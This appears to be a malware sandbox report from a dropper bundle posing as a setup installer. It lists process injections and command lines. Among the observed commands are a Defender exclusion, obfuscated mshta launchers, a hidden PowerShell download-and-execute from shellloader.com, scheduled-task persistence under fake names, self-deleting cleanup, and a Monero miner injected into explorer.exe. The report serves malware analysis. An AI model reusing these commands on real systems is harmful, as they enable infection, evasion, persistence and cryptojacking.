PID 3400 wrote to memory of 4128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe
PID 5108 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5108 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 3424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3596 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat199ba8a4637dcb034.exe
PID 3596 wrote to memory of 3816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat199ba8a4637dcb034.exe
PID 4428 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe
PID 4428 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe
PID 4428 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe
PID 3568 wrote to memory of 4084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat191649b47c9e2.exe
PID 3568 wrote to memory of 4084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat191649b47c9e2.exe
PID 4388 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19f84b58b3d7.exe
PID 4388 wrote to memory of 4636 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19f84b58b3d7.exe
PID 2532 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe
PID 2532 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe
PID 2532 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe
PID 3692 wrote to memory of 4540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe
PID 3692 wrote to memory of 4540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe
PID 3692 wrote to memory of 4540 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe
PID 4084 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat191649b47c9e2.exe C:\ProgramData\820992.exe

Processes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\ProgramData\820992.exe

"C:\ProgramData\820992.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\ProgramData\4916599.exe

"C:\ProgramData\4916599.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\ProgramData\889030.exe

"C:\ProgramData\889030.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\is-24343.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-24343.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$301E8,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\ProgramData\5295645.exe

"C:\ProgramData\5295645.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Users\Admin\AppData\Local\Temp\is-UDHJP.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UDHJP.tmp\setup_2.tmp" /SL5="$301FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\ProgramData\6848594.exe

"C:\ProgramData\6848594.exe"

C:\ProgramData\928377.exe

"C:\ProgramData\928377.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 960

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\3782043.exe

"C:\ProgramData\3782043.exe"

C:\ProgramData\1860007.exe

"C:\ProgramData\1860007.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\ProgramData\889030.exe

"C:\ProgramData\889030.exe"

C:\ProgramData\889030.exe

"C:\ProgramData\889030.exe"

C:\ProgramData\3510382.exe

"C:\ProgramData\3510382.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 672

C:\Users\Admin\AppData\Local\Temp\is-U084N.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-U084N.tmp\setup_2.tmp" /SL5="$20208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\1860007.exe

"C:\ProgramData\1860007.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\928377.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\928377.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\ProgramData\5898233.exe

"C:\ProgramData\5898233.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\3510382.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\3510382.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 948

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 808

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 656

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4548 -s 1568

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\is-FJS9H.tmp\postback.exe

"C:\Users\Admin\AppData\Local\Temp\is-FJS9H.tmp\postback.exe" ss1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 764

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\928377.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\928377.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\3510382.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\3510382.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 1020

C:\Windows\SysWOW64\explorer.exe

explorer.exe ss1

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "3510382.exe" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "928377.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3268 -s 1940

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"

C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe

"C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\60-a6f67-ece-0febc-549e9c64ccfa7\Qelaecejuca.exe

"C:\Users\Admin\AppData\Local\Temp\60-a6f67-ece-0febc-549e9c64ccfa7\Qelaecejuca.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"

C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp" /SL5="$302CE,281924,62464,C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\eb-f287e-293-8ee97-a656dd53ac63e\Fokifyfulo.exe

"C:\Users\Admin\AppData\Local\Temp\eb-f287e-293-8ee97-a656dd53ac63e\Fokifyfulo.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im Sat19e6a852f849bb2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe" & del C:\ProgramData\*.dll & exit

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe

"C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\taskkill.exe

taskkill /im Sat19e6a852f849bb2.exe /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\coro104b.gxq\GcleanerEU.exe /eufive & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe /qn CAMPAIGN="654" & exit

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s BITS

C:\Users\Admin\AppData\Local\Temp\coro104b.gxq\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\coro104b.gxq\GcleanerEU.exe /eufive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxrgytmr.42q\anyname.exe & exit

C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe

C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe /qn CAMPAIGN="654"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmguzdvf.xe4\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\oxrgytmr.42q\anyname.exe

C:\Users\Admin\AppData\Local\Temp\oxrgytmr.42q\anyname.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im EtGb23GfX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\taskkill.exe

taskkill /im EtGb23GfX.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01xlnkab.lgt\autosubplayer.exe /S & exit

C:\Users\Admin\AppData\Local\Temp\vmguzdvf.xe4\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\vmguzdvf.xe4\gcleaner.exe /mixfive

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 5E4B7F2EA7580098D20D75BE98F8B7B9 C

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\6OvxjtPJ9.exe

"C:\Users\Admin\AppData\Local\Temp\6OvxjtPJ9.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133683 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding E6E769788A719934642CB1D495629EE2

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Users\Admin\AppData\Local\Temp\54E7.exe

C:\Users\Admin\AppData\Local\Temp\54E7.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pdis51nw\pdis51nw.cmdline"

C:\Users\Admin\AppData\Local\Temp\9T0OnGIGy.exe

"C:\Users\Admin\AppData\Local\Temp\9T0OnGIGy.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84F0.tmp" "c:\Users\Admin\AppData\Local\Temp\pdis51nw\CSCFE3377FE34294FF6B88C449BB1BFDBC0.TMP"

C:\Users\Admin\AppData\Local\Temp\8752.exe

C:\Users\Admin\AppData\Local\Temp\8752.exe

C:\Users\Admin\AppData\Local\Temp\9F21.exe

C:\Users\Admin\AppData\Local\Temp\9F21.exe

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7F990FF4B9B189A13ECA71060C43E29E E Global\MSI0000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\54E7.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Bf4dexN5Nl.exe

"C:\Users\Admin\AppData\Local\Temp\Bf4dexN5Nl.exe"

C:\Users\Admin\AppData\Local\Temp\CC3D.exe

C:\Users\Admin\AppData\Local\Temp\CC3D.exe

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"

C:\Windows\SysWOW64\cmd.exe

